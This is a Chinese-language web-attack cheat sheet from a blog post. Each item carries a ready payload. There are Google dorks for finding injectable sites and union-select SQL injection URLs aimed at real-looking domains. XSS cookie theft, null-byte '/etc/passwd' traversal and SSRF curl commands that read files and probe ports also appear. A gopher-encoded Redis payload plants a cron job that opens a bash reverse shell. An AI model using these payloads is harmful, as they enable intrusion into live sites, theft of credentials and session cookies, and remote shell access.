bwvs

sql注入

  • hack search 查找目標網(wǎng)站(inurl:"xxx.php?id=")
  • url后追加'單引號,看情況,判定是否存在注入

字符串型注入

  • 查看id=1 and 1=1 id=1 and 1=2結(jié)果一致,類型判定完畢
  • 判定col數(shù),這里可以用工具或手動
    http://www.xxxx.org/news.php?id=10040%27%20union%20select%201,database(),3,4,5%27

數(shù)字型注入

  • 分別在url后追加id=1 and 1=1 id=1 and 1=2查看結(jié)果不一致,類型判定完畢
  • 判定col數(shù),這里可以用工具或手動
    http://xx.xx.fr/game.php?id=135%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12

xss

反射型

  • 輸入</>&#,看返回情況

存儲型

  • 輸入</>&#,看返回情況
  • 利用xss平臺收集cookie信息

暴力破解

  • github找字典,上工具

命令執(zhí)行

通過PHP的執(zhí)行函數(shù)時,exec_shell,system

文件包含

通過PHP的函數(shù)引入文件時,由于傳入的文件名沒有經(jīng)過合理的校驗

文件截斷

PHP內(nèi)核是由C語言實現(xiàn)的,因此使用了C語言中的一些字符串處理函數(shù)。在連接字符串時,0字節(jié)(\x00)將作為字符串的結(jié)束符。所以在這個地方,攻擊者只要在最后加入一個0字節(jié),就能截斷file變量之后的字符串。

  • ../etc/passwd\0
  • ../etc/passwd%00

Session劫持

上傳

SSRF漏洞

服務(wù)端請求偽造,不限制協(xié)議,可以介入任意協(xié)議

CURL本地利用

遠程利用

  • 利用file協(xié)議任意文件讀取
    curl -v 'http://sec.com:8082/sec/ssrf.php?url=file:///etc/passwd'

  • 利用dict協(xié)議查看端口
    curl -v 'http://sec.com:8082/sec/ssrf.php?url=dict://127.0.0.1:22'

  • 利用gopher協(xié)議反彈shell
    curl -v 'http://sec.com:8082/sec/ssrf.php?url=gopher%3A%2F%2F127.0.0.1%3A6379%2F_%2A3%250d%250a%243%250d%250aset%250d%250a%241%250d%250a1%250d%250a%2456%250d%250a%250d%250a%250a%250a%2A%2F1%20%2A%20%2A%20%2A%20%2A%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F127.0.0.1%2F2333%200%3E%261%250a%250a%250a%250d%250a%250d%250a%250d%250a%2A4%250d%250a%246%250d%250aconfig%250d%250a%243%250d%250aset%250d%250a%243%250d%250adir%250d%250a%2416%250d%250a%2Fvar%2Fspool%2Fcron%2F%250d%250a%2A4%250d%250a%246%250d%250aconfig%250d%250a%243%250d%250aset%250d%250a%2410%250d%250adbfilename%250d%250a%244%250d%250aroot%250d%250a%2A1%250d%250a%244%250d%250asave%250d%250a%2A1%250d%250a%244%250d%250aquit%250d%250a'

協(xié)議(基本跟SSRF沒差別)

php://input偽協(xié)議

php://filter偽協(xié)議

data://偽協(xié)議

phar://偽協(xié)議

弱類型

php

  • '1a' == '1' 為true
  • strcmp() php5.3后這函數(shù)如果比較成功則返回0.....
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時請結(jié)合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

  • 首先說一下302跳轉(zhuǎn),豬豬俠烏云上提出的,可繞過ssrf一些利用限制 支持http(s)協(xié)議的除了可以探測內(nèi)網(wǎng)we...
    CanMeng閱讀 1,683評論 0 1
  • [{"reportDate": "2018-01-23 23:28:49","fluctuateCause": n...
    加勒比海帶_4bbc閱讀 879評論 1 2
  • 一、Python簡介和環(huán)境搭建以及pip的安裝 4課時實驗課主要內(nèi)容 【Python簡介】: Python 是一個...
    _小老虎_閱讀 6,313評論 0 10
  • Spring Cloud為開發(fā)人員提供了快速構(gòu)建分布式系統(tǒng)中一些常見模式的工具(例如配置管理,服務(wù)發(fā)現(xiàn),斷路器,智...
    卡卡羅2017閱讀 136,506評論 19 139
  • “紅木”這個詞很中國,它只屬于中國?!袄贤狻狈g不了這個詞,因為“紅木”這個詞的背后,拖著一卡車的中式文化?!凹t木...
    青蛙不旅行閱讀 344評論 0 0

友情鏈接更多精彩內(nèi)容